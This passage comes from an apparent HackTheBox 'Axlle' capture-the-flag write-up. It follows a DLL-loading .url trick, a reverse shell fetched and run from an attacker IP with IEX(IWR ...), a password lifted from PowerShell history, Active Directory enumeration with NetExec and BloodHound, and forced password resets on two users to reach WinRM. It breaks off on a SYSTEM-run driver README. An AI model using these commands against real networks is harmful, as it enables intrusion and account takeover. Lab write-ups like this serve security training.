PS C:\Windows\Tasks> $fileSystemAccessRule = New-Object System.Security.AccessControl.FileSystemAccessRule("Everyone", "FullControl", "Allow")
PS C:\Windows\Tasks> $acl.SetAccessRule($fileSystemAccessRule)
PS C:\Windows\Tasks> Set-Acl C:\Windows\Tasks\mscorsvc.dll $acl
```

Now, all we need to do is create a `.url` file similar to the one from the article.

```console
Add-Content -Path "C:\inetpub\testing\Opcode.url" -Value "[InternetShortcut]"
Add-Content -Path "C:\inetpub\testing\Opcode.url" -Value "URL=C:\Windows\WinSxS\amd64_netfx4-ngentask_exe_b03f5f7f11d50a3a_4.0.15806.0_none_d4049e1f6926b032\ngentask.exe"
Add-Content -Path "C:\inetpub\testing\Opcode.url" -Value "WorkingDirectory=C:\Windows\Tasks\"
```

We don't need to worry about the `Zone.Identifier` stream either, as files downloaded with `Invoke-WebRequest` do not carry MoTW. However, the CRLF vs. LF issue bothers me, and I built the file entirely via Powershell's `Add-Content`.  
It worked once again, and I obtained a shell as `dallon.matrix`.

I was also curious whether hosting the DLL via SMB would work. I attempted the attack, and I did receive a connection to my SMB server, but the DLL did NOT get loaded. Either it got patched, or I made a mistake.

I upgraded to [ConPtyShell](https://github.com/antonioCoco/ConPtyShell):

```console
C:\Windows\Tasks> powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\Tasks> IEX(IWR http://10.10.14.185:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.185 9001
```

## Post-shell AD enumeration

```console
PS C:\> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== =============================================
axlle\dallon.matrix S-1-5-21-1005535646-190407494-3473065389-1125


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users              Alias            S-1-5-32-559                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Group used for deny only
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
AXLLE\Web Devs                             Group            S-1-5-21-1005535646-190407494-3473065389-1127 Mandatory group, Enabled by default, Enabled group
AXLLE\Employees                            Group            S-1-5-21-1005535646-190407494-3473065389-1103 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                      Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

I ran [adPEAS](https://github.com/61106960/adPEAS) and [PrivescCheck](https://github.com/itm4n/PrivescCheck) again, but nothing useful came out.


```console
PS C:\Windows\Tasks> IEX(IWR http://10.10.14.185:8000/PrivescCheck.ps1 -UseBasicParsing)
PS C:\Windows\Tasks> Invoke-PrivescCheck -Extended
```

Credentials are present in PowerShell history:

```console
PS C:\> cat C:\Users\dallon.matrix\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
$SecPassword = ConvertTo-SecureString 'PJsO1du$CVJ#D' -AsPlainText -Force;
$Cred = New-Object
System.Management.Automation.PSCredential('dallon.matrix', $SecPassword);
```

## Post-credential AD enumeration

[NetExec](https://github.com/Pennyw0rth/NetExec) makes enumeration straightforward.  
Starting with SMB enumeration:

```console
root@576e8bcd5c00:~# nxc smb 10.10.11.21 -d axlle.htb -u 'dallon.matrix' -p 'PJsO1du$CVJ#D' --shares
SMB         10.10.11.21     445    MAINFRAME        [*] Windows Server 2022 Build 20348 x64 (name:MAINFRAME) (domain:axlle.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.21     445    MAINFRAME        [+] axlle.htb\dallon.matrix:PJsO1du$CVJ#D 
SMB         10.10.11.21     445    MAINFRAME        [*] Enumerated shares
SMB         10.10.11.21     445    MAINFRAME        Share           Permissions     Remark
SMB         10.10.11.21     445    MAINFRAME        -----           -----------     ------
SMB         10.10.11.21     445    MAINFRAME        ADMIN$                          Remote Admin
SMB         10.10.11.21     445    MAINFRAME        C$                              Default share
SMB         10.10.11.21     445    MAINFRAME        IPC$            READ            Remote IPC
SMB         10.10.11.21     445    MAINFRAME        NETLOGON        READ            Logon server share 
SMB         10.10.11.21     445    MAINFRAME        SYSVOL          READ            Logon server share 
SMB         10.10.11.21     445    MAINFRAME        WebTesting                      
```

RID cycling:

```console
root@576e8bcd5c00:~# nxc smb 10.10.11.21 -d axlle.htb -u 'dallon.matrix' -p 'PJsO1du$CVJ#D' --rid-brute 10000
SMB         10.10.11.21     445    MAINFRAME        [*] Windows Server 2022 Build 20348 x64 (name:MAINFRAME) (domain:axlle.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.21     445    MAINFRAME        [+] axlle.htb\dallon.matrix:PJsO1du$CVJ#D 
SMB         10.10.11.21     445    MAINFRAME        498: AXLLE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.21     445    MAINFRAME        500: AXLLE\Administrator (SidTypeUser)
SMB         10.10.11.21     445    MAINFRAME        501: AXLLE\Guest (SidTypeUser)
SMB         10.10.11.21     445    MAINFRAME        502: AXLLE\krbtgt (SidTypeUser)
SMB         10.10.11.21     445    MAINFRAME        512: AXLLE\Domain Admins (SidTypeGroup)
SMB         10.10.11.21     445    MAINFRAME        513: AXLLE\Domain Users (SidTypeGroup)
SMB         10.10.11.21     445    MAINFRAME        514: AXLLE\Domain Guests (SidTypeGroup)
SMB         10.10.11.21     445    MAINFRAME        515: AXLLE\Domain Computers (SidTypeGroup)
SMB         10.10.11.21     445    MAINFRAME        516: AXLLE\Domain Controllers (SidTypeGroup)
SMB         10.10.11.21     445    MAINFRAME        517: AXLLE\Cert Publishers (SidTypeAlias)
SMB         10.10.11.21     445    MAINFRAME        518: AXLLE\Schema Admins (SidTypeGroup)
SMB         10.10.11.21     445    MAINFRAME        519: AXLLE\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.21     445    MAINFRAME        520: AXLLE\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.21     445    MAINFRAME        521: AXLLE\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.21     445    MAINFRAME        522: AXLLE\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.21     445    MAINFRAME        525: AXLLE\Protected Users (SidTypeGroup)
SMB         10.10.11.21     445    MAINFRAME        526: AXLLE\Key Admins (SidTypeGroup)
SMB         10.10.11.21     445    MAINFRAME        527: AXLLE\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.21     445    MAINFRAME        553: AXLLE\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.21     445    MAINFRAME        571: AXLLE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.21     445    MAINFRAME        572: AXLLE\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.21     445    MAINFRAME        1000: AXLLE\MAINFRAME$ (SidTypeUser)
SMB         10.10.11.21     445    MAINFRAME        1101: AXLLE\DnsAdmins (SidTypeAlias)
SMB         10.10.11.21     445    MAINFRAME        1102: AXLLE\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.21     445    MAINFRAME        1103: AXLLE\Employees (SidTypeGroup)
SMB         10.10.11.21     445    MAINFRAME        1104: AXLLE\Accounts (SidTypeGroup)
SMB         10.10.11.21     445    MAINFRAME        1105: AXLLE\HR (SidTypeGroup)
SMB         10.10.11.21     445    MAINFRAME        1106: AXLLE\Sales (SidTypeGroup)
SMB         10.10.11.21     445    MAINFRAME        1108: AXLLE\App Devs (SidTypeGroup)
SMB         10.10.11.21     445    MAINFRAME        1109: AXLLE\david.brice (SidTypeUser)
SMB         10.10.11.21     445    MAINFRAME        1110: AXLLE\frankie.rose (SidTypeUser)
SMB         10.10.11.21     445    MAINFRAME        1111: AXLLE\brad.shaw (SidTypeUser)
SMB         10.10.11.21     445    MAINFRAME        1112: AXLLE\samantha.jade (SidTypeUser)
SMB         10.10.11.21     445    MAINFRAME        1113: AXLLE\gideon.hamill (SidTypeUser)
SMB         10.10.11.21     445    MAINFRAME        1114: AXLLE\xavier.edmund (SidTypeUser)
SMB         10.10.11.21     445    MAINFRAME        1115: AXLLE\emily.cook (SidTypeUser)
SMB         10.10.11.21     445    MAINFRAME        1116: AXLLE\brooke.graham (SidTypeUser)
SMB         10.10.11.21     445    MAINFRAME        1117: AXLLE\trent.langdon (SidTypeUser)
SMB         10.10.11.21     445    MAINFRAME        1118: AXLLE\matt.drew (SidTypeUser)
SMB         10.10.11.21     445    MAINFRAME        1119: AXLLE\jess.adams (SidTypeUser)
SMB         10.10.11.21     445    MAINFRAME        1120: AXLLE\jacob.greeny (SidTypeUser)
SMB         10.10.11.21     445    MAINFRAME        1121: AXLLE\simon.smalls (SidTypeUser)
SMB         10.10.11.21     445    MAINFRAME        1122: AXLLE\dan.kendo (SidTypeUser)
SMB         10.10.11.21     445    MAINFRAME        1123: AXLLE\lindsay.richards (SidTypeUser)
SMB         10.10.11.21     445    MAINFRAME        1124: AXLLE\calum.scott (SidTypeUser)
SMB         10.10.11.21     445    MAINFRAME        1125: AXLLE\dallon.matrix (SidTypeUser)
SMB         10.10.11.21     445    MAINFRAME        1126: AXLLE\baz.humphries (SidTypeUser)
SMB         10.10.11.21     445    MAINFRAME        1127: AXLLE\Web Devs (SidTypeGroup)
```

Some NetExec modules:

```console
root@576e8bcd5c00:~# nxc smb 10.10.11.21 -d axlle.htb -u 'dallon.matrix' -p 'PJsO1du$CVJ#D' -M enum_av
SMB         10.10.11.21     445    MAINFRAME        [*] Windows Server 2022 Build 20348 x64 (name:MAINFRAME) (domain:axlle.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.21     445    MAINFRAME        [+] axlle.htb\dallon.matrix:PJsO1du$CVJ#D 
ENUM_AV     10.10.11.21     445    MAINFRAME        Found Windows Defender INSTALLED

root@576e8bcd5c00:~# nxc ldap 10.10.11.21 -d axlle.htb -u 'dallon.matrix' -p 'PJsO1du$CVJ#D' -M adcs
SMB         10.10.11.21     445    MAINFRAME        [*] Windows Server 2022 Build 20348 x64 (name:MAINFRAME) (domain:axlle.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.21     389    MAINFRAME        [+] axlle.htb\dallon.matrix:PJsO1du$CVJ#D 
ADCS        10.10.11.21     389    MAINFRAME        [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'

root@576e8bcd5c00:~# nxc ldap 10.10.11.21 -d axlle.htb -u 'dallon.matrix' -p 'PJsO1du$CVJ#D' -M maq
SMB         10.10.11.21     445    MAINFRAME        [*] Windows Server 2022 Build 20348 x64 (name:MAINFRAME) (domain:axlle.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.21     389    MAINFRAME        [+] axlle.htb\dallon.matrix:PJsO1du$CVJ#D 
MAQ         10.10.11.21     389    MAINFRAME        [*] Getting the MachineAccountQuota
MAQ         10.10.11.21     389    MAINFRAME        MachineAccountQuota: 10

root@576e8bcd5c00:~# nxc ldap 10.10.11.21 -d axlle.htb -u 'dallon.matrix' -p 'PJsO1du$CVJ#D' -M whoami
SMB         10.10.11.21     445    MAINFRAME        [*] Windows Server 2022 Build 20348 x64 (name:MAINFRAME) (domain:axlle.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.21     389    MAINFRAME        [+] axlle.htb\dallon.matrix:PJsO1du$CVJ#D 
WHOAMI      10.10.11.21     389    MAINFRAME        distinguishedName: CN=Dallon Matrix,DC=axlle,DC=htb
WHOAMI      10.10.11.21     389    MAINFRAME        Member of: CN=Web Devs,CN=Users,DC=axlle,DC=htb
WHOAMI      10.10.11.21     389    MAINFRAME        name: Dallon Matrix
WHOAMI      10.10.11.21     389    MAINFRAME        Enabled: Yes
WHOAMI      10.10.11.21     389    MAINFRAME        Password Never Expires: Yes
WHOAMI      10.10.11.21     389    MAINFRAME        Last logon: 133671572615187029
WHOAMI      10.10.11.21     389    MAINFRAME        pwdLastSet: 133627394650898078
WHOAMI      10.10.11.21     389    MAINFRAME        logonCount: 81
WHOAMI      10.10.11.21     389    MAINFRAME        sAMAccountName: dallon.matrix
```

And some groups:

```console
root@576e8bcd5c00:~# nxc ldap 10.10.11.21 -d axlle.htb -u 'dallon.matrix' -p 'PJsO1du$CVJ#D' -M group-mem -o group='Remote Management Users'
SMB         10.10.11.21     445    MAINFRAME        [*] Windows Server 2022 Build 20348 x64 (name:MAINFRAME) (domain:axlle.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.21     389    MAINFRAME        [+] axlle.htb\dallon.matrix:PJsO1du$CVJ#D 
GROUP-MEM   10.10.11.21     389    MAINFRAME        [+] Found the following members of the Remote Management Users group:
GROUP-MEM   10.10.11.21     389    MAINFRAME        jacob.greeny
GROUP-MEM   10.10.11.21     389    MAINFRAME        baz.humphries

root@576e8bcd5c00:~# nxc ldap 10.10.11.21 -d axlle.htb -u 'dallon.matrix' -p 'PJsO1du$CVJ#D' -M group-mem -o group='Remote Desktop Users'
SMB         10.10.11.21     445    MAINFRAME        [*] Windows Server 2022 Build 20348 x64 (name:MAINFRAME) (domain:axlle.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.21     389    MAINFRAME        [+] axlle.htb\dallon.matrix:PJsO1du$CVJ#D 

root@576e8bcd5c00:~# nxc ldap 10.10.11.21 -d axlle.htb -u 'dallon.matrix' -p 'PJsO1du$CVJ#D' -M group-mem -o group='Administrators'
SMB         10.10.11.21     445    MAINFRAME        [*] Windows Server 2022 Build 20348 x64 (name:MAINFRAME) (domain:axlle.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.21     389    MAINFRAME        [+] axlle.htb\dallon.matrix:PJsO1du$CVJ#D 
GROUP-MEM   10.10.11.21     389    MAINFRAME        [+] Found the following members of the Administrators group:
GROUP-MEM   10.10.11.21     389    MAINFRAME        Administrator
GROUP-MEM   10.10.11.21     389    MAINFRAME        Enterprise Admins
GROUP-MEM   10.10.11.21     389    MAINFRAME        Domain Admins

root@576e8bcd5c00:~# nxc ldap 10.10.11.21 -d axlle.htb -u 'dallon.matrix' -p 'PJsO1du$CVJ#D' -M group-mem -o group='Protected Users'
SMB         10.10.11.21     445    MAINFRAME        [*] Windows Server 2022 Build 20348 x64 (name:MAINFRAME) (domain:axlle.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.21     389    MAINFRAME        [+] axlle.htb\dallon.matrix:PJsO1du$CVJ#D 

root@576e8bcd5c00:~# nxc ldap 10.10.11.21 -d axlle.htb -u 'dallon.matrix' -p 'PJsO1du$CVJ#D' -M group-mem -o group='Domain Computers'
SMB         10.10.11.21     445    MAINFRAME        [*] Windows Server 2022 Build 20348 x64 (name:MAINFRAME) (domain:axlle.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.21     389    MAINFRAME        [+] axlle.htb\dallon.matrix:PJsO1du$CVJ#D 

root@576e8bcd5c00:~# nxc ldap 10.10.11.21 -d axlle.htb -u 'dallon.matrix' -p 'PJsO1du$CVJ#D' -M group-mem -o group='Accounts'
SMB         10.10.11.21     445    MAINFRAME        [*] Windows Server 2022 Build 20348 x64 (name:MAINFRAME) (domain:axlle.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.21     389    MAINFRAME        [+] axlle.htb\dallon.matrix:PJsO1du$CVJ#D 
GROUP-MEM   10.10.11.21     389    MAINFRAME        [+] Found the following members of the Accounts group:
GROUP-MEM   10.10.11.21     389    MAINFRAME        brad.shaw
GROUP-MEM   10.10.11.21     389    MAINFRAME        gideon.hamill
GROUP-MEM   10.10.11.21     389    MAINFRAME        simon.smalls
GROUP-MEM   10.10.11.21     389    MAINFRAME        lindsay.richards

root@576e8bcd5c00:~# nxc ldap 10.10.11.21 -d axlle.htb -u 'dallon.matrix' -p 'PJsO1du$CVJ#D' -M group-mem -o group='HR'
SMB         10.10.11.21     445    MAINFRAME        [*] Windows Server 2022 Build 20348 x64 (name:MAINFRAME) (domain:axlle.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.21     389    MAINFRAME        [+] axlle.htb\dallon.matrix:PJsO1du$CVJ#D 
GROUP-MEM   10.10.11.21     389    MAINFRAME        [+] Found the following members of the HR group:
GROUP-MEM   10.10.11.21     389    MAINFRAME        david.brice
GROUP-MEM   10.10.11.21     389    MAINFRAME        frankie.rose
GROUP-MEM   10.10.11.21     389    MAINFRAME        samantha.jade
GROUP-MEM   10.10.11.21     389    MAINFRAME        jess.adams

root@576e8bcd5c00:~# nxc ldap 10.10.11.21 -d axlle.htb -u 'dallon.matrix' -p 'PJsO1du$CVJ#D' -M group-mem -o group='Sales'
SMB         10.10.11.21     445    MAINFRAME        [*] Windows Server 2022 Build 20348 x64 (name:MAINFRAME) (domain:axlle.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.21     389    MAINFRAME        [+] axlle.htb\dallon.matrix:PJsO1du$CVJ#D 
GROUP-MEM   10.10.11.21     389    MAINFRAME        [+] Found the following members of the Sales group:
GROUP-MEM   10.10.11.21     389    MAINFRAME        xavier.edmund
GROUP-MEM   10.10.11.21     389    MAINFRAME        emily.cook
GROUP-MEM   10.10.11.21     389    MAINFRAME        brooke.graham
GROUP-MEM   10.10.11.21     389    MAINFRAME        matt.drew

root@576e8bcd5c00:~# nxc ldap 10.10.11.21 -d axlle.htb -u 'dallon.matrix' -p 'PJsO1du$CVJ#D' -M group-mem -o group='App Devs'
SMB         10.10.11.21     445    MAINFRAME        [*] Windows Server 2022 Build 20348 x64 (name:MAINFRAME) (domain:axlle.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.21     389    MAINFRAME        [+] axlle.htb\dallon.matrix:PJsO1du$CVJ#D 
GROUP-MEM   10.10.11.21     389    MAINFRAME        [+] Found the following members of the App Devs group:
GROUP-MEM   10.10.11.21     389    MAINFRAME        jacob.greeny
GROUP-MEM   10.10.11.21     389    MAINFRAME        baz.humphries

root@576e8bcd5c00:~# nxc ldap 10.10.11.21 -d axlle.htb -u 'dallon.matrix' -p 'PJsO1du$CVJ#D' -M group-mem -o group='Web Devs'
SMB         10.10.11.21     445    MAINFRAME        [*] Windows Server 2022 Build 20348 x64 (name:MAINFRAME) (domain:axlle.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.21     389    MAINFRAME        [+] axlle.htb\dallon.matrix:PJsO1du$CVJ#D 
GROUP-MEM   10.10.11.21     389    MAINFRAME        [+] Found the following members of the Web Devs group:
GROUP-MEM   10.10.11.21     389    MAINFRAME        trent.langdon
GROUP-MEM   10.10.11.21     389    MAINFRAME        dan.kendo
GROUP-MEM   10.10.11.21     389    MAINFRAME        calum.scott
GROUP-MEM   10.10.11.21     389    MAINFRAME        dallon.matrix
```

I also used [BloodyAD](https://github.com/CravateRouge/bloodyAD) to look for abusable DACLs:

```console
opcode@debian$ bloodyAD --host 10.10.11.21 -d axlle.htb -u dallon.matrix -p 'PJsO1du$CVJ#D' get writable

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=axlle,DC=htb
permission: WRITE

distinguishedName: CN=Dallon Matrix,DC=axlle,DC=htb
permission: WRITE
```

Nothing here. BloodyAD only checks direct relations. For a more elaborate search, we can collect Bloodhound data:

```console
root@576e8bcd5c00:~# nxc ldap 10.10.11.21 -d axlle.htb -u 'dallon.matrix' -p 'PJsO1du$CVJ#D' --bloodhound --dns-server 10.10.11.21 -c All -k
SMB         10.10.11.21     445    MAINFRAME        [*] Windows Server 2022 Build 20348 x64 (name:MAINFRAME) (domain:axlle.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.21     389    MAINFRAME        [+] axlle.htb\dallon.matrix:PJsO1du$CVJ#D 
LDAP        10.10.11.21     389    MAINFRAME        Resolved collection methods: rdp, dcom, psremote, container, localadmin, trusts, group, acl, objectprops, session
LDAP        10.10.11.21     389    MAINFRAME        Using kerberos auth without ccache, getting TGT
LDAP        10.10.11.21     389    MAINFRAME        Done in 00M 13S
LDAP        10.10.11.21     389    MAINFRAME        Compressing output into /root/.nxc/logs/MAINFRAME_10.10.11.21_2024-08-03_120927_bloodhound.zip
```

Transfer the collected data out of the container:

```console
opcode@debian$ docker cp netexec:/root/.nxc/logs/MAINFRAME_10.10.11.21_2024-08-03_120927_bloodhound.zip ~/
```

I started neo4j and Bloodhound:

```console
opcode@debian$ sudo neo4j console
```

```console
opcode@debian$ ./BloodHound --in-process-gpu
```

I marked `dallon.matrix` as owned and looked for potential DACLs to abuse.

![2](images/2.png)

It found that `dallon.matrix` belongs to the group `Web Devs` and members of that group have `ForceChangePassword` privilege over `jacob.greeny` and `baz.humphries`, both members of `Remote Management Users` group.

BloodyAD can be used to change the passwords:

```console
opcode@debian$ bloodyAD --host 10.10.11.21 -d axlle.htb -u dallon.matrix -p 'PJsO1du$CVJ#D' set password jacob.greeny Opcode@123!
[+] Password changed successfully!

opcode@debian$ bloodyAD --host 10.10.11.21 -d axlle.htb -u dallon.matrix -p 'PJsO1du$CVJ#D' set password baz.humphries Opcode@123!
[+] Password changed successfully!
```

We can obtain shell as them both. However, I encountered a weird bug with the WinRM protocol on NetExec:

```console
root@3cf6eae85928:~# nxc smb 10.10.11.21 -d axlle.htb -u 'jacob.greeny' -p 'Opcode@123!'
SMB         10.10.11.21     445    MAINFRAME        [*] Windows Server 2022 Build 20348 x64 (name:MAINFRAME) (domain:axlle.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.21     445    MAINFRAME        [+] axlle.htb\jacob.greeny:Opcode@123! 

root@3cf6eae85928:~# nxc ldap 10.10.11.21 -d axlle.htb -u 'jacob.greeny' -p 'Opcode@123!'
SMB         10.10.11.21     445    MAINFRAME        [*] Windows Server 2022 Build 20348 x64 (name:MAINFRAME) (domain:axlle.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.21     389    MAINFRAME        [+] axlle.htb\jacob.greeny:Opcode@123! 

root@3cf6eae85928:~# nxc winrm 10.10.11.21 -d axlle.htb -u 'jacob.greeny' -p 'Opcode@123!'
WINRM       10.10.11.21     5985   MAINFRAME        [*] Windows Server 2022 Build 20348 (name:MAINFRAME) (domain:axlle.htb)
WINRM       10.10.11.21     5985   MAINFRAME        [-] axlle.htb\jacob.greeny:Opcode@123!
```

Instead of using NetExec, we can get a session as `gideon.hamill` and use `Enter-PSSession`:

```console
PS C:\> $SecPassword = ConvertTo-SecureString 'Opcode@123!' -AsPlainText -Force
PS C:\> $Cred = New-Object System.Management.Automation.PSCredential('axlle\jacob.greeny', $SecPassword)
PS C:\> New-PSSession -Credential $Cred | Enter-PSSession
```

```console
[localhost]: PS C:\> whoami /all

USER INFORMATION
----------------

User Name          SID
================== =============================================
axlle\jacob.greeny S-1-5-21-1005535646-190407494-3473065389-1120


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Group used for deny only
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
AXLLE\App Devs                             Group            S-1-5-21-1005535646-190407494-3473065389-1108 Mandatory group, Enabled by default, Enabled group
AXLLE\Employees                            Group            S-1-5-21-1005535646-190407494-3473065389-1103 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

```console
PS C:\> $SecPassword = ConvertTo-SecureString 'Opcode@123!' -AsPlainText -Force
PS C:\> $Cred = New-Object System.Management.Automation.PSCredential('axlle\baz.humphries', $SecPassword)
PS C:\> New-PSSession -Credential $Cred | Enter-PSSession
```

```console
[localhost]: PS C:\> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== =============================================
axlle\baz.humphries S-1-5-21-1005535646-190407494-3473065389-1126


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Group used for deny only
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
AXLLE\App Devs                             Group            S-1-5-21-1005535646-190407494-3473065389-1108 Mandatory group, Enabled by default, Enabled group
AXLLE\Employees                            Group            S-1-5-21-1005535646-190407494-3473065389-1103 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

It does not matter which of the two users is used for the next steps. The next part of the box is related to the `App Development` directory present in root.

```console
[localhost]: PS C:\> Get-Acl '.\App Development\'

    Directory: C:\


Path            Owner                  Access
----            -----                  ------
App Development BUILTIN\Administrators BUILTIN\Administrators Allow  FullControl...


[localhost]: PS C:\> Get-Acl '.\App Development\' | fl


Path   : Microsoft.PowerShell.Core\FileSystem::C:\App Development\
Owner  : BUILTIN\Administrators
Group  : AXLLE\Domain Users
Access : BUILTIN\Administrators Allow  FullControl
         AXLLE\App Devs Allow  ReadAndExecute, Synchronize
Audit  :
Sddl   : O:BAG:DUD:PAI(A;OICI;FA;;;BA)(A;OICI;0x1200a9;;;S-1-5-21-1005535646-190407494-3473065389-1108)
```

Members of the group `App Devs` can read its contents. Both `jacob.greeny` and `baz.humphries` satisfy this criteria.

```console
[localhost]: PS C:\App Development\kbfiltr> cat .\README.md
# Keyboard Translation Program
This is an application in development that uses a WDF kbfiltr as the basis for a translation program. The aim of this application is to allow users to program and simulate custom keyboard layouts for real or fictional languages.

## Features
- Create custom keyboard layouts for real or fictional languages.
- Simulate keyboard inputs using the custom layouts.
- Secret codes to switch between languages and logging output.

## Progress
- kbfiltr driver - Complete
- Keyboard mapping - Complete (hardcoded in driver)
- Custom mapping in application layer - In progress
- Logging - Complete
- Activation of logging - Complete
- Simulation of other keyboard layouts - Incomplete
- Activation of other keyboard layouts - Incomplete

**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**

## Prerequisites
- Windows 10 or higher
- Visual Studio 2019
- Windows Driver Kit (WDK) 10

## Getting Started
- Clone this repository.
- Open the solution file in Visual Studio.
- Build the solution in Release mode.
- Install the driver by running `.\devcon.exe install .\kbfiltr.inf "*PNP0303"` as Administrator.
- Install the driver as an upperclass filter with `.\devcon.exe /r classfilter keyboard upper -keylogger` as Administrator.
- Install the application by running the install_app.bat file as Administrator.
- Reboot your computer to load the driver.
- Launch the application and start programming your custom keyboard layouts.

## Usage
### Programming a Custom Layout
- Launch the application.
- Click on the Program Layout button.
- Select the language for which you want to program the layout.
- Select the key you want to modify from the list.
- Modify the key's scancode and virtual key code as required.
- Repeat steps 4 and 5 for all the keys you want to modify.
- Save the layout by clicking on the Save Layout button.

### Simulating Inputs
- Launch the application.
- Click on the Simulate Input button.
- Select the language for which you want to simulate the input.
- Type in the input in the normal English layout.
- Trigger language switch as outlined below (when required).
- Verify that the input is translated to the selected language.

### Logging Output
- Launch the application.
- Turn on logging (shortcuts can be created as explained below)
- Use the application as normal.
- The log file will be created in the same directory as the application.

## Triggering/Activation
